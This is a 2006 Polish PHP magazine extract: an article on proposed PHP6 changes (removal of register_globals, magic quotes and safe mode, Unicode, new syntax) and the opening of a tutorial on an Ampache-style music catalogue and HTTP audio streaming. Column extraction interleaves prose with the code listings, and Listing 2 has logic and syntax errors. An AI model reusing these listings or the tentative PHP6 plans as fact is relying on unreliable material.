Richard Davey
W SIECI
1. http://www.corephp.co.uk
– Blog Richarda Daveya
2. http://www.php.net/~derick/
meeting-notes.html
– sprawozdanie ze
spotkania twórców PHP
3. http://shiflett.org/archive/135
– informacje na temat PHP6
na blogu Chrisa Shifletta
4. http://www.internetnews.com/
dev-news/article.php/
3557711
– ogólne informacje na temat
PHP6
5. http://www.zend.com/
collaboration
– PHP Collaboration Project
18
Jedenastego listopada, 2005 roku w Paryżu
odbyło się spotkanie twórców platformy PHP.
Kluczowym elementem spotkania była dyskusja
nad wyznaczeniem przyszłych kierunków
rozwoju dla tej technologii. W wyniku rozmów
powstał protokół opisujący pomysły związane
z odsłoną PHP6.
N
iestety dokument ten, ze wzglę-
du na rozmiary i poziom szcze-
gółowości jest stosunkowo trud-
ny w odbiorze. Dlatego też napisałem ni-
niejszy artykuł, który w przystępny i kom-
paktowy sposób prezentuje wszystkie
kluczowe aspekty poruszane w trakcie
wspomnianej dyskusji. Dzięki temu, bez
zbędnego wysiłku, każdy zainteresowa-
ny może dowiedzieć się, jakie nowe moż-
liwości kryją się pod maską PHP6.
Zanim przejdziemy do szczegółów
należy jasno zaznaczyć jedno: nie ma
stuprocentowej gwarancji, że udogod-
nienia przedstawione w dalszej części ni-
niejszego tekstu staną się na pewno czę-
ścią specyfikacji PHP6. Prezentowane
rozwiązania należy postrzegać raczej ja-
ko aktualną, aczkolwiek niezobowiązują-
cą wizję nowej wersji PHP.
Unicode
Wsparcie dla Unicode zależy na dzień dzi-
siejszy od żądania klienta. Taki stan rze-
www.phpsolmag.org
Stopień trudności: lll
czy powoduje, że PHP musi przechowy-
wać informacje na temat nazw klas, metod
czy funkcji podwójnie: zarówno w formacie
Unicode, jak i w formacie zawężonym.
W rezultacie potrzeba na to wszystko dużo
zasobów. Nowe podejście proponowane
w PHP6 polega na tym, że kwestia wspar-
cia dla Unicode będzie zależna od serwe-
ra, nie od żądania. Szacuje się, że wyłą-
czenie wsparcia dla Unicode, w przypadku
kiedy funkcjonalność ta jest niepotrzebna
może przyśpieszyć działanie operacji na
stringach nawet o 300%, zaś działanie ca-
łej aplikacji o około 25%. Przeniesienie de-
cyzji co do wsparcia dla Unicode do php.ini
obciąża odpowiedzialnością za kontrolę tej
opcji nie użytkownika (programisty), a ad-
ministratora systemu, na którym urucho-
miona jest aplikacja.
W przypadku potrzeby samodzielnego
skompilowania PHP warto mieć na uwa-
dze, że od wersji 6 wymagane będą bi-
blioteki ICU (oczywiście tylko wtedy, kie-
dy potrzebne jest wsparcie dla Unicode).
PHP Solutions Nr 3/2006

System przy kompilacji ogłosi błąd, jeśli
wymagane biblioteki nie będą dostępne.
Mówiąc krótko: trzeba będzie instalować
kolejny pakiet w celu skompilowania PHP.
Żegnamy register globals
Tak, tak... nadszedł w końcu czas, aby
pożegnać się z register globals. Wy-
chodzi na to, że PHP6 definitywnie koń-
czy erę skryptów pisanych w stylu PHP3
(i generalnie wszelkich skryptów wyko-
rzystujących zmienne globalne). Jedy-
nym wyjściem z tej sytuacji będzie prze-
pisanie istniejącego kodu w poprawny
sposób. Jest to dość śmiały, aczkolwiek
już od dawna potrzebny krok ze względu
na aspekt bezpieczeństwa.
Magic Quotes usunięte
Wraz z ogłoszeniem PHP6, magic qu-
otes znikną najprawdopodobniej raz na
zawsze. W przypadku ich użycia rzuca-
ny będzie wyjątek E_CORE_ERROR.
Wprowadzone zmiany dotyczyć będą
magic _ quotes, magic _ quotes _ sybase
i magic _ quotes _ gpc.
Nigdy więcej Safe Mode
Wiadomość ta ucieszy zapewne progra-
mistów, których klienci domagają się włą-
czania tego trybu. W tym momencie Safe
Mode znika raz na zawsze. Krok ten po-
wodowany jest właśnie złym rozumieniem
tej funkcjonalności przez osoby postron-
ne. Wielu ludziom wydaje się, że działanie
w trybie Safe Mode w jakiś sposób zwięk-
sza bezpieczeństwo PHP, co oczywiście
nie jest prawdą. Funkcjonalność open _
R E
PHP Solutions Nr 3/2006
basedir pozostanie mimo wszystko czę-
ścią PHP.
Słowo kluczowe 'var' aliasem
'public'
W PHP4 słowo kluczowe 'var' używane
było wewnątrz klas. W PHP5 postępo-
wanie takie prowadziło do powstawania
ostrzeżenia (przy korzystaniu z trybu E_
STRICT). Ostrzeżenie to ma być usunię-
te w PHP6, jako że słowo kluczowe 'var'
ma być aliasem słowa kluczowego 'pu-
blic'. Jest to miłe udogodnienie, tyle, że
energia osób które poświeciły swój czas
na usuwanie wspomnianych ostrzeżeń
po wprowadzeniu PHP5, poszła w pew-
nym sensie na marne.
Zwracanie przez referencję
powoduje błąd
Konstrukcje w stylu $foo =& new Std-
Class() bądź function &foo będą rzucać
wyjątek E_STRICT.
Tryb kompatybilności zend.ze1
usunięty
zend.ze1_compatibility _mode było za-
wsze próbą podtrzymania starych zacho-
wań PHP4. W związku z tym, że funkcjo-
nalność ta nigdy w 100% nie działała po-
prawnie, używanie jej w PHP6 będzie
prawdopodobnie zabronione, pod groźbą
wystąpienia wyjątku E_CORE_ERROR.
Usunięte wsparcie
dla Freetype 1 i GD 1
Wsparcie dla tych obydwu (bardzo, bar-
dzo starych) bibliotek będzie usunięte.
K L A M
www.phpsolmag.org
PHP6 Początki
dl() dostępny tylko
z poziomu SAPI
Każde SAPI będzie rejestrować użycie tej
funkcji w razie potrzeby, przy czym jedynie
CLI oraz zagnieżdżone SAPI będą mogły
korzystać z tej funkcjonalności. W żadnym
innym miejscu nie będzie ona dostępna.
FastCGI zawsze włączone
Kod FastCGI będzie wyczyszczony i za-
wsze włączony dla CGI SAPI. Nie będzie
możliwości wyłączenia tej funkcjonalności.
Długie tablice usunięte
Ciekaw jestem, czy Czytelnicy pamiętają
jeszcze zmienne globalne HTTP _ * _ VARS.
Cóż, w przypadku jeśli ktoś nie używa
$ _ GET, $ _ POST, itd. – proponuję rozpo-
cząć to robić, gdyż bardzo prawdopodob-
ne jest, że od PHP6 możliwość stosowa-
nia długich tablic będzie niedostępna (pod
groźbą wystąpienia E_CORE_ERROR
w przypadku ich użycia).
Zmiany w rozszerzeniach
Rozszerzenia XMLReader i XMLWriter
zostaną przeniesione do podstawowej
dystrybucji i będą automatycznie włą-
czone. Rozszerzenie ereg zostanie
przeniesione do PECL, co oznacza że
PCRE nie będzie możliwe do wyłącze-
nia. Dzięki temu można będzie wpro-
wadzić nowe rozszerzenie do obsługi
wyrażeń regularnych w oparciu o ICU.
Niezmiernie przydatne rozszerzenie
Fileinfo będzie przeniesione do podsta-
wowej dystrybucji i automatycznie włą-
czone.
A
19
Początki PHP6
Rozszerzenia silnika PHP
64-bitowy typ całkowity: PHP zostanie-
także rozszerzone o całkowicie nowy,
już 64-bitowy typ całkowity (int64). Nie
będzie typu int32.
Goto: komenda goto nie będzie do-
dana, za to słowo kluczowe break bę-
dzie rozszerzone o statyczną etykietę.
Dzięki temu można będzie użyć konstruk-
cji break foo w celu wykonania skoku do
etykiety foo: umieszczonej w kodzie źró-
dłowym.
Ifsetor(): wygląda na to, że funkcjonal-
ność ta będzie usunięta (niestety). Jed-
nak w zastępstwie tego operator ?: nie
będzie wymagał środkowego parametru,
dzięki czemu możliwe będzie używanie
następującej konstrukcji:
$foo = $_GET['foo'] ?: 42;
(jeśli foo is prawdą, to $foo będzie rów-
ne 42). Taki zapis powinien zaoszczędzić
trochę zbędnego pisania kodu, ale osobi-
ście wydaje mi się, że jego czytelność po-
zostawia wiele do życzenia.
foreach dla tablic wielowymiarowych:
to zdecydowanie miła zmiana, która po-
zwoli łatwo iterować po listach tablic.
foreach( $a as $k => list($a, $b))
{} kontra []: na dzień dzisiejszy przy od-
woływaniu się do poszczególnych zna-
ków w napisach możliwe jest używa-
nie zarówno notacji {} jak i []. Jednak
już od PHP5.1 notacja {} będzie powo-
dować rzucanie wyjątku E_STRICT zaś
od PHP6 będzie ona całkowicie niedo-
stępna. Dodatkowo przy pomocy [] bę-
dzie można odwoływać się do fragmen-
tów napisu i korzystać z funkcjonalności
oferowanej przez array _ slice (na przy-
kład: [2,]). W mojej opinii jest to bardzo
pomocne rozszerzenie.
Zmiany związane
z obiektowością
Statyczne Wiązanie (ang. Static Binding):
wprowadzone będzie nowe słowo kluczo-
we, aby pozwolić na wykonywanie póź-
nych wiązań statycznych. Wywołanie
static::static2(), będzie odpowiedzial-
ne za ewaluację zmiennych statycznych
na etapie czasu wykonania.
Przestrzenie nazw (ang. Namespa-
ces): wygląda na to, że ta kwestia jest
ciągle nierozstrzygnięta... trzeba jeszcze
trochę poczekać na ostateczną decyzję.
20
Określanie typu zmiennej na podsta-
wie zwracanej wartości (ang. Type-hinted
Return Values): dostaniemy wsparcie dla
określania typu zmiennej na podstawie
zwracanej wartości. Jak dotąd, nie okre-
ślono jeszcze, jak będzie wygadać skład-
nia dla tego mechanizmu języka, jednak
koncepcja wygląda ciekawie.
Wywoływanie funkcji dynamicznych
jako statycznych będzie powodować błąd
E_FATAL: na dzień dzisiejszy można wy-
woływać zarówno metody statyczne jak i
dynamiczne, bez względu na to, czy są
faktycznie dynamiczne czy statyczne.
Od PHP6 wywoływanie funkcji dynamicz-
nych jako statycznych będzie powodować
powstanie błędu E_FATAL.
Rozszerzenia PHP
APC będzie umieszczone w podstawo-
wej dystrybucji: APC będzie standardo-
wo dołączone do podstawowej dystry-
bucji PHP, jednak nie będzie automa-
tycznie włączone.
Wzmacniająca łata dla PHP: ła-
ta ta ma implementować zbiór dodatko-
wych testów powiązanych z bezpieczeń-
stwem PHP. Warto wymienić następują-
ce usprawnienia w tym zakresie: ochro-
na przed dzieleniem odpowiedzi HTTP,
podział allow _ url _ fopen na dwie czę-
sci: allow _ url _ fopen i allow _ url _ in-
clude, automatyczne włączenie allow _
url _ fopen i automatyczne wyłączenie
allow _ url _ include.
E_STRICT dołączone z E_ALL: to
coś naprawdę poważnego! Wiadomości
na poziomie E_STRICT będą automatycz-
nie dołączone do E_ALL. Jest to zdecydo-
wany ruch w stronę przymusowej edukacji
programistów w zakresie stosowania wła-
ściwych praktyk programowania w PHP.
Koniec z notacją <%: oznacza to ko-
niec wspierania tagów w stylu ASP, nadal
pozostanie jednak skrócony tag <?.
Podsumowanie
Mówiąc krótko: PHP6 w zdecydowany
sposób wyznacza nowe interesujące kie-
runki i przeciera nowe ścieżki. Wygląda
na to, że twórcy technologii mają ambicje
wymusić stosowanie właściwych technik
programistycznych poprzez odrzucenie
starego paradygmatu kodowania w sty-
lu: cóż, POWINIENEŚ wykonać to w ten
sposób, ale zawsze możesz zrobić to po
staremu. Od PHP6 nie będzie już robie-
nia rzeczy po staremu. Usunięcie takich
naleciałości języka jak zmienne globalne,
www.phpsolmag.org
magic quotes, długie tablice czy indekso-
wanie napisów za pomocą {} będzie zwy-
czajnie zmuszać programistów do stoso-
wania poprawnych technik.
Z drugiej strony, wiele istniejących
skryptów po prostu przestanie dzia-
łać, zaś w dużej części takich przypad-
ków ponowne uruchomienie aplikacji bę-
dzie, bardzo trudne i czasochłonne. Czy
to źle? Osobiście, nie sądzę – podejrze-
wam jednak, że z tego powodu adaptacja
PHP6 potrwa jeszcze wolniej niż miało to
miejsce w przypadku PHP5. A to raczej
nie wyjdzie nikomu na dobre. Jednak wy-
daje mi się, że taki stanowczy krok musi
być kiedyś wykonany. Jak już raz przez to
przejdziemy, wtedy będzie o wiele łatwiej
rozwijać PHP o dalsze kolejne właściwo-
ści, o których dziś trudno nawet marzyć.
Warto w tym miejscu wspomnieć
o przedsięwzięciu PHP Collaboration Fra-
mework (projekt Eclipse PHP i Zend PHP
Framework), które skupiło wokół siebie
wielu czołowych graczy z branży IT: IBM,
Oracle, MySQL czy Intel. Przedsięwzię-
cie to na dzień dzisiejszy postrzegane
jest jako główny motor przyszłych sukce-
sów platformy PHP. Wspomniana inicja-
tywa bazuje aktualnie na PHP5, jednak
w przyszłości ten albo podobne projekty
będą zapewne wspierać PHP6.
Na koniec, w ramach ciekawostki war-
to zaznaczyć, że twórcy PHP nie postrze-
gają platformy J2EE jako rywala i techno-
logii odniesienia dla dalszego rozwoju PHP.
Za technologię, z której chcą czerpać po-
mysły, uważają raczej Microsoft .NET.
W związku z tym można się spodziewać,
że w przyszłości wiele rozwiązań zastoso-
wanych w PHP6 będzie opierać się wła-
śnie na pomysłach stosowanych w .NET.
Zainteresowanym polecam lektu-
rę pełnego sprawozdania ze spotkania
w Paryżu; jest ono dostępne pod adre-
sem: http://www.php.net/~derick/meeting-
notes.html n
O autorze
Richard Davey jest programistą posia-
dającym certyfikat Zend. Pracuje głów-
nie z aplikacjami związanymi z grami
komputerowymi. Posiada własny blog
poświęcony PHP, dostępny pod adre-
sem http://www.corephp.co.uk. Richard
od 1996 programuje aplikacje webowe
i nadal zdumiony jest kierunkiem w któ-
rym rozwija się Sieć i PHP. Autor żyje
wraz z żoną w Anglii.
PHP Solutions Nr 3/2006
Techniki

Strumieniowa transmisja
dźwięku przez HTTP
z wykorzystaniem Ampache
Stopień trudności: lll
Karl Vollmer

Do stworzenia portalu multimedialnego nie

trzeba drogich, komercyjnych, wydzielonych
serwerów. Wystarczą PHP, serwer Apache oraz
baza MySQL. W artykule pokażemy kompletne
rozwiązanie umożliwiające streaming audio.

W SIECI
1. http://www.faqs.org/rfcs/
rfc2616.html
– RFC 2616 (nagłówki HTTP)
2. https://svn.ampache.org/trunk/lib/
stream.lib.php
– Ampache Public SVN
(przykłady kodu)
3. https://svn.ampache.org/trunk/play/
index.php
– kod źródłowy, który wykorzystali-
śmy
4. http://www.ampache.org
– Ampache Development
5. https://ampache.bountysource.com
A
mpache to wydawany na licen-
cji GNU General Public Licen-
se interfejs WWW do strumie-
niowych transmisji różnych formatów pli-
ków dźwiękowych przez protokół HTTP.
Można go także stosować do nadzoro-
wania serwerów MPD, Icecast2 i Moosic
(ta funkcja Ampache jest często stosowa-
na do zdalnej obsługi domowego zestawu
stereo). Przez ostatnie cztery lata kod Am-
pache odpowiedzialny za strumieniowa-
nie ewoluował od wykorzystania modułu
Mod::mp3 serwera Apache do samodziel-
nej obsługi transmisji wzbogaconej o moż-
liwość transkodowania, downsamplingu
oraz wyszukiwania strumieni przez HTTP
i HTTPS.
W niniejszym artykule stworzymy apli-
kację do rekursywnego katalogowania pli-
ków muzycznych oraz wyświetlania tych
danych. Następnie zajmiemy się transmi-
sjami strumieniowymi dźwięku przez pro-
tokół HTTP za pomocą PHP, a potem za-
stosujemy downsampling. Na koniec omó-
wimy różne metody monitorowania piose-
nek aktualnie odsłuchiwanych przez użyt-
kowników skryptu i zachowanie różnych
klientów.
Robimy odtwarzacz
Przejdźmy do skatalogowania plików
dźwiękowych. Proces ten będzie się opie-
rał na wzorcach nazw plików – do indek-
sowania według danych ze znaczników
ID3 potrzebny byłby skrypt getid3() (http:
Co powinieneś
wiedzieć...
Konieczna jest podstawowa znajomość
PHP i Apache. Wskazane jest też do-
świadczenie w konfiguracji PHP i znajo-
mość terminologii związanej z audycjami
internetowymi.
Co obiecujemy...
Stworzymy aplikację, która przygotuje re-
kursywny katalog plików dźwiękowych
oraz umożliwi ich strumieniowanie oraz
downsampling.

22 www.phpsolmag.org PHP Solutions Nr 3/2006


Wymagania
l PHP 4.1.2 lub nowsze
l MySQL 3.2.3 lub nowsza z kontem
umożliwiającym stworzenie nowej
bazy
l Serwer WWW obsługujący PHP
(Apache, IIS lub inny)
Instalacja Ampache
l Pobierz najnowsze archiwum z
http:/ /ampache.org /downloads /
current.tar.gz i rozpakuj je do głów-
nego katalogu serwera WWW.
l Uruchom przeglądarkę i skieruj ją
do głównego katalogu rozpakowa-
nego Ampache.
l Wykonuj pojawiające się polecenia.
//getid3.org). Dane będziemy przechowy-
wać w bazie danych z jedną tabelą (patrz
Listing 1). Każdy z wierszy tabeli będzie
zawierał informacje o tytule utworu, albu-
mie, wykonawcy i rozmiarze pliku.
Praca nad katalogiem
Nasz skrypt katalogujący będzie nosił na-
zwę katalog.php (patrz Listing 2). Trze-
ba pamiętać, że domyślnie każdy skrypt
PHP wygasa po 30 sekundach. Aby temu
zapobiec (jest to konieczne w przypadku
dużych katalogów), ustawimy parametr
time_limit na 0 za pomocą wbudowanej
funkcji PHP set_time_limit().
Następnie spróbujemy utworzyć połą-
czenie z bazą danych. Jeśli będzie to nie-
możliwe, program przestanie się wykony-
wać dzięki wyrażeniu or_die().
Kolejną ważną rzeczą jest zdefiniowa-
nie tablicy $extensions, zawierającej typy
plików brane pod uwagę podczas prze-
szukiwania muzyki. Ustawiliśmy obsłu-
gę rozszerzeń mp3, ogg i flac, ale do tej
listy można dodać dowolne formaty pli-
ków. Kolejnym krokiem będzie zdefiniowa-
nie tablicy $tags oraz zmiennej tekstowej
$pattern. Przydadzą się one później, na-
Rysunek 1. Widok albumu w Ampache
PHP Solutions Nr 3/2006
streaming audio w PHP Techniki
Listing 1. Tabela bazy danych przechowująca dane o utworach muzycznych
CREATE TABLE `music` (
`id` int(11) unsigned NOT NULL auto_increment,
`file` varchar(255) NOT NULL default '',
`title` varchar(255) NOT NULL default '',
`album` varchar (255) NOT NULL default '',
`artist` varchar(255) NOT NULL default '',
`size` int(11) unsigned NOT NULL default '0',
KEY `album` (`album`), KEY `artist` (`artist`),
KEY `id` (`id`), KEY `file` (`file`),
) TYPE=MyISAM;
piszemy bowiem kod, który będzie auto- niekończącej się pętli, otwieramy podkata-
matycznie parsował nazwę pliku i pobierał log wyłącznie wtedy, gdy jest on dowiąza-
z niej informacje o wykonawcy, albumie i niem twardym (sprawdzamy to za pomo-
tytule utworu. Zmienna $pattern zdefiniu- cą is_link()).
je wzorzec parsowania nazwy, zaś za po- Wreszcie, jeżeli nazwa wskazuje na
mocą $tags połączymy przetworzone czę- plik, a nie na katalog, sprawdzamy za po-
ści z etykietami artist, album i title. średnictwem jego rozszerzenia (znajdujące-
Na koniec umieścimy wywołanie funk- go się w $GLOBALS['extension']) popraw-
cji gather_files(), która rozpocznie wy- ność pliku audio. Jeżeli plik jest popraw-
szukiwanie muzyki w katalogach na dys- ny, pobieramy jego dane za pomocą funkcji
ku. Podamy jej parametr określający kata- get_file_info(), której jeszcze nie stworzyli-
log, w którym należy rozpocząć przeszu- śmy. Potem dodajemy te informacje do ba-
kiwanie (w tym przypadku będzie to kata- zy danych przy użyciu kolejnej niestworzo-
log główny). nej jeszcze funkcji – insert_file().
Przyszedł czas na zdefiniowanie funk-
cji gather_files(). Rozpoczyna ona swo- Potrzebne informacje
je działanie od otwarcia głównego kata- Stwórzmy teraz funkcję get_file_info().
logu, który zostaje podany jako parametr Funkcja ta pobierze pełną nazwę każde-
($path), a następnie rekursywnie (pętla go kolejnego pliku jako swój jedyny argu-
while) wyszukuje w aktualnym katalogu ment i zwróci tablicę asocjacyjną z danymi
pliki, których rozszerzenia są wymienione o każdym utworze muzycznym.
w tablicy globalnej $extensions, a zdefi- Jak już wspomniano, użyjemy wzor-
niowanej wcześniej. ców i znaczników do pobrania nazwy al-
Funkcja pomija pliki o nazwach „.” i bumu, wykonawcy i piosenki z nazwy pli-
“..” poprzez przeskok do następnej iteracji ku. Warto byłoby dowiedzieć się, w jaki
while (przy użyciu continue). Jeżeli odnaj- sposób to działa.
dzie podkatalog o innej nazwie, wywołuje
się sama z nazwą katalogu podaną jako Downsampling
argument. W celu uniknięcia ryzyka wska-
z użyciem zewnętrznych
zania na dowiązanie symboliczne i podą-
żenia za nim, co mogłoby prowadzić do narzędzi
Mp3splt dzieli plik MP3 przed wysłaniem
go do LAME w celu ponownego zako-
dowania. Ampache umożliwia konfigu-
rację, jednak domyślne polecenie down-
samplingu wygląda następująco:
mp3splt -qnf %FILE% %OFFSET%
%EOF% -o -
| lame --mp3input -q 3 -b
%SAMPLE% -S - -
Łańcuchy między znakami % są za-
stępowane przez zmienną.
www.phpsolmag.org 23
Techniki streaming audio w PHP

Przyjrzyjmy się najpierw globalnej logami, można jednak użyć innego znaku, Na początku funkcja get_file_info()
zmiennej tekstowej $pattern. Zawiera ona na przykład myślnika (-) lub podkreślnika tworzy tablicę $results zawierającą jedno
wzorzec, który wskazuje tej funkcji, w jaki (_). W rezultacie wzorzec %a/%A/%t ozna- pole o nazwie file, które wskazuje na peł-
sposób nazwa pliku powinna zostać po- cza album/wykonawca/tytul. ną ścieżkę podaną jako parametr.
dzielona na części. Każda część jest opi- Nasza funkcja wymaga również Następnie dokonuje iteracji na wszyst-
sana kilkoma znakami (atrybutem) – tu- zdefiniowania innej zmiennej global- kich możliwych znacznikach wzorca zdefi-
taj użyjemy %t dla tytułu piosenki, %a dla nej: $GLOBALS['tags']. Jest to tablica niowanych w $GLOBALS['tags'].
albumu oraz %A dla wykonawcy. Wszyst- asocjacyjna wiążąca atrybuty z nazwa- To właśnie ta funkcja, wykorzystuje je
kie atrybuty w łańcuchu są rozdzielone mi znaczników, które będą użyte do ge- do konstrukcji wyrażeń regularnych, któ-
znakiem separatora – my używamy /, co nerowania wyników zwracanych przez re pomogą pobrać dane odpowiadające
oznacza, że części będą kolejnymi kata- funkcję. atrybutom wskazywanym przez znaczniki.
Otrzymane dane będą przechowywane w
$results pod nazwą każdego ze znaczni-
Listing 2. Zawartość /catalog.php
ków. Po zebraniu wszystkich potrzebnych
<?php informacji funkcja zwraca tablicę $results
set_time_limit(0); zawierającą nazwę pliku, album, nazwę
$dbh = mysql_connect('localhost','user','password') or die
wykonawcy i tytuł utworu.
('BŁĄD: nie można połączyć się z bazą danych');
$extensions = array('mp3','ogg','flac');
$tags = array('title'=>'%t','album'=>'%a','artist'=>'%A'); Umieszczenie informacji w bazie
$pattern = '%a/%A/%t'; //definicja wzorca nazwy pliku; ignoruje rozszerzenie danych
gather_files('/home/mymusic'); // rozpoczęcie zbierania plików Czas na utworzenie funkcji insert_file(),
function gather_files($path) {
która doda zebrane informacje (podane
$handle = opendir(stripslashes($path)); // otwiera katalog
while ( false !== ( $file = readdir($handle) ) ) { jako parametr) do bazy danych. Dane zo-
$file = addslashes($file); // konieczne do uniknięcia ' w nazwach plików staną oczyszczone, a z bazy będą pobie-
if ($file == "." AND $file == "..") { continue; } rane oddzielne elementy. Aby je uporząd-
@chdir(stripslashes($path); kować, użyjemy funkcji sql_escape(), któ-
$full_file = stripslashes($path."/".$file);
rą zresztą będziemy musieli utworzyć.
$full_file = str_replace("//","/",$full_file);
if (is_dir($full_file)) {gather_files($full_file); continue;} Jest ona dostosowana do MySQL, więc w
$info = pathinfo($full_file); // pobierz dane o pliku przypadku korzystania z innej bazy należy
if (in_array($info[‘extension’],$GLOBALS['extensions'])) { ją odpowiednio zmodyfikować. Po oczysz-
$file_info = get_file_info($full_file); // pobierz informacje o pliku czeniu elementów skorzystamy z funkcji
insert_file($file_info);}
PHP filesize() w celu pobrania rozmia-
} // zakończ, jeśli bieżący katalog
@closedir($handle); // zamknij uchwyt katalogu ru pliku — informacja ta zostanie umiesz-
} czona w rekordzie bazy danych, który
function get_file_info($full_file) { również zostanie dodany (będzie potrzeb-
$results = array('file'=>$full_file); ny podczas transmisji). Musimy też utwo-
foreach ($GLOBALS['tags'] as $name=>$tag) {
rzyć zapytanie SQL i wykonać je za pomo-
$preg_pattern = str_replace($tag,"(.+)",$GLOBALS['pattern']);
$preg_pattern = preg_replace("/\%\w/",".+",$preg_pattern); cą mysql_query() na uchwycie bazy da-
$preg_pattern = "/" . str_replace("/","\/",$preg_pattern) . "\..+/"; nych $GLOBALS['dbh']. Dzięki temu dane
preg_match($preg_pattern,$full_file,$matches); zostaną dodane do bazy.
$results[$name] = stripslashes($matches[1]);
}
return $results;
Kurtyna w górę
} Skatalogowaliśmy już muzykę i zapisali-
function insert_file($data) { śmy dane o utworach w bazie danych. Te-
$title = sql_escape($data['title']); raz musimy znaleźć sposób, aby je wy-
$album= sql_escape($data[‘album’]); świetlić. Na Listingu 3 przedstawiono pro-
$artist = sql_escape($data['artist']);
sty interfejs (index.php), który wyświetla
$file = sql_escape($data['file']);
$size = filesize($data['file']); całą kolekcję. Skrypt ten pokazuje wszyst-
$sql = "INSERT INTO `music` (`title`,`album`,`artist`,`file`,`size`) kie utwory, co mogłoby znacznie spowol-
VALUES"." ('$title','$album','$artist','$file','$size')"; nić jego wykonywanie w przypadku du-
$db_results = mysql_query($sql, $GLOBALS['dbh']); return true; żych zbiorów muzycznych, ale dla na-
}
szych potrzeb jest odpowiedni, a w dodat-
function sql_escape($string,$dbh=0) {
if (!is_resource($dbh)) { $dbh = $GLOBALS['dbh']; } ku można go łatwo rozbudować.
if (function_exists('mysql_real_escape_string')) { Połączymy się z bazą danych przy
$string = mysql_real_escape_string($string,$dbh); użyciu wyrażenia or_die(), co zatrzy-
}else { $string = mysql_escape_string($string); } ma wykonywanie skryptu w razie błędu
return $string; }
połączenia. Uchwytem bazy danych jest
?>
$GLOBALS['dbh']. Następnie wykonuje-
my proste zapytanie SELECT * FROM music

24 www.phpsolmag.org PHP Solutions Nr 3/2006


Listing 3. Zawartość /index.php
<?php
$dbh = mysql_connect
('localhost','user','password')
or die
('BŁĄD: nie można połączyć się
z bazą danych');
$sql = "SELECT * FROM music
ORDER BY title";
$db_results = mysql_query
($sql, $GLOBALS['dbh']);
?>
<p>Oglądanie utworów:</p>
<dl>
<?php
while ($r = mysql_fetch_assoc(
$db_results)) {
$link = "/play.php?song_id="
. $r['id'];
$name = $r['album'] . ' - ' .
$r['artist'] . ' - ' .
$r['title']
?>
<dd><a href="
<?php echo $link; ?>">
<?php echo $name; ?></a></dd>
<?php } // end while loop ?>
</dl>
ORDER BY title, które wybierze wszystkie
wiersze z tabeli music i poukłada je we-
dług tytułu (pole title).
Potem za pomocą wyrażenia while()
dokonamy iteracji na zwróconych wy-
nikach. Dla każdego wiersza zostanie
utworzony odsyłacz ($link) do skryp-
tu play.php, który stworzymy później, ra-
zem z ID aktualnej piosenki jako parame-
trem. Razem z $link zostanie utworzony
łańcuch $name, zawierający informacje o
aktualnym utworze, albumie, wykonawcy
i tytule wyświetlane przy każdym odsyła-
czu. Dzięki temu skrypt wyświetli komplet-
ny odsyłacz.
Transmisja strumieniowa:
niech gra muzyka
Przejdźmy teraz do właściwej transmisji.
Jak już wspomniano, stworzymy skrypt
play.php, który zajmie się transmisją wy-
branego pliku. Warto zauważyć, że nie
możemy strumieniować pliku w tym sa-
mym skrypcie, który generuje interfejs
– transmisja opiera się na manipulacji na-
główkami HTTP, która byłaby niemożliwa
w obrębie jednego skryptu.
Poprzez te manipulacje informuje-
my przeglądarkę, że udostępniany jest
plik dźwiękowy, a nie skrypt PHP. Na
Rysunku 1 przedstawiono widok albu-
mu w Ampache (za http://ampache.org).
PHP Solutions Nr 3/2006
streaming audio w PHP Techniki
Wszystkie pokazane tam odnośniki do Można zauważyć, że w przypadku pli-
odtwarzania wybranych utworów wska- ku FLAC rozszerzenie ma postać .ogg:
zują na /play/index.php (kod źródłowy jest to spowodowane błędem w niektó-
można przeglądać pod adresem https: rych wersjach odtwarzacza Winamp. Nie
//svn.ampache.org/trunk/play/index.php) jest on w stanie rozpoznać, co powinien
– jest to po prostu bardziej rozbudowana zrobić z plikiem .flac, więc musimy spra-
wersja skryptu play.php. Po uruchomieniu wić, aby traktował go jako .ogg, jednocze-
/play/index.php w przeglądarce WWW zo- śnie pozostawiając Content-Type w posta-
baczymy, że plik ten został uznany przez ci audio/x-flac – dzięki temu klient zasto-
aplikację za plik dźwiękowy (Rysunek 2). suje właściwy kodek.
Stwórzmy teraz plik play.php (Listing Następnie za pomocą wyrażenia
4). Będzie to kompletny skrypt, zdolny header() przekażemy mu dwa nagłówki:
do strumieniowania plików OGG, FLAC i Content-type:, zawierający przygotowane
MP3 na podstawie ID utworu. Umożliwi dane oraz Content-Disposition: z łańcu-
on też downsampling oraz przeszukiwanie chem rozszerzenia pliku.
określonej części pliku. Wysyłanie tych nagłówków to jedna
Tak jak w przypadku poprzednich z najważniejszych funkcji całej aplikacji,
skryptów, zaczniemy od połączenia z ba- ponieważ zmusza ona aplikację kliencką,
zą. Następnie pobierzemy dane utworu z aby uznała plik za dźwiękowy, choć w rze-
bazy danych za pomocą ID przekazanego czywistości jest to plik PHP.
do skryptu. Typ pliku ustawimy na podsta- Następnie powinniśmy ustawić w pliku
wie rozszerzenia pliku odczytanego z po- php.ini zmienną time_limit na 0, co za-
la file w wynikach. Będzie to MP3, OGG pobiegnie wygaśnięciu skryptu oraz wy-
lub FLAC — przygotujemy też odpowied- łączyć magic quotes podczas uruchamia-
ni nagłówek Content-type (audio/mpeg, nia (set_magic_quotes_runtime(0)), aby
application/x-ogg lub audio/x-flac). zabezpieczyć fread(). Teraz otwieramy
Now Playing
Now Playing (Teraz odtwarzane) to popularna funkcja Ampache, która umożliwia obserwo-
wanie aktualnie transmitowanych plików. Została ona dodana w marcu 2004 r. i była jed-
ną z trudniejszych do zaimplementowania opcji. Trudność wynika z pasywnej natury HTTP
i różnic między aplikacjami klienckimi. Istnieją dwa podstawowe typy klientów – chciwe i
uprzejme. Chciwe klienty, na przykład Windows Media Player, próbują pobrać plik najszyb-
ciej, jak to możliwe. Klienty uprzejme, takie jak XMMS, pobierają tylko dane potrzebne do
zapełnienia bufora.
Funkcja Now Playing wymaga wspólnego miejsca (np. bazy danych) przechowywania da-
nych operacyjnych. Istnieje kilka algorytmów określania aktualnie odtwarzanego na serwe-
rze utworu. Podstawowa metoda jest następująca:
l przechowywanie rekordu z unikalnym ID i czasem wygaśnięcia równym time()
+ długość utworu,
l garbage collection na utworach, które wygasły.
Druga metoda wykorzystuje wywołanie ignore_user_abort(TRUE), co powoduje zignoro-
wanie przez PHP sygnału przerwania wysyłanego przez klienta i wyczyszczenie pamięci
na samym końcu skryptu. Metoda ta pozwala uniknąć wielu wpisów Now Playing w przy-
padku, gdy użytkownik nacisnął next przed końcem utworu – nie działa jednak z chciwy-
